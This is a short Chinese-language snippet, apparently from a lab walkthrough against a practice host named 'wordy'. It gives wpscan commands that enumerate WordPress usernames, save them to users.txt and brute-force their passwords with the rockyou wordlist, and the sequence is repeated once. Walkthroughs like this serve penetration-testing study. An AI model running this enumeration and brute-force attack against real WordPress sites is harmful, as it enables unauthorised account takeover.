wpscan --url http://wordy/ -e u
将刚刚枚举到的用户名存储在桌面上的文本文档中
vim users.txt
暴力破解
wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt
wpscan --url http://wordy/ -e u
将刚刚枚举到的用户名存储在桌面上的文本文档中
vim users.txt
暴力破解
wpscan --url http://wordy/ -U users.txt -P /usr/share/wordlists/rockyou.txt
Copyright © 2018 - 2021 www.yd166.com., All Rights Reserved.